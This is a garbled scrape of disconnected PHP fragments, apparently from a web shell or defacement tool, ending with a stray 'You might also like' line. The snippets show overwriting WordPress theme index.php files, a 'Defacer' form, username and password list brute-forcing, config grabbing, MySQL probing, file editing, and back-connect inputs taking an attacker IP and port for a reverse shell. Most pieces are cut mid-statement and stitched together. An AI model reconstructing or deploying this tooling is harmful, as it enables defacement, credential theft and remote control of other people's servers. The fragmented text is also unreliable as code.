nts($site_url.'/wp-content/themes/'.$template.'/index.php');$cond = 1;}} else {$

, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hid

($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" targ

t_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"

://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red

rt/form-data" method="POST"><div align='center'><span lang='en-us'><b>Defacer&nb

userlist=explode("\n",$users);$passlist=explode("\n",$pass);print "<b>[~] Wait .

($con)." proto ".mysql_get_proto_info($con)."</p>";$msg .= "</div>";echo $msg;if

="submit"><br></form></div></center><?php }if ($_POST['conf']) {$function = $fun

elseif(isset($_GET['x']) && ($_GET['x'] == 'config')){ error_reporting(0);if ($_

sql_error());if($k2){echo '<br><br><center><h1>Done ... -> <a href="'.$site_url.

@fclose($filez);}?><form action="?y=<?php echo $pwd;?>&amp;edit=<?php echo $file

$ip = trim($_POST['ip']);$port = trim($_POST['backport']);tulis("bcp",$back_conn

if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($i

You might also like

@fclose($filez);}?><form action="?y=<?php echo $pwd;?>&edit=<?php echo $file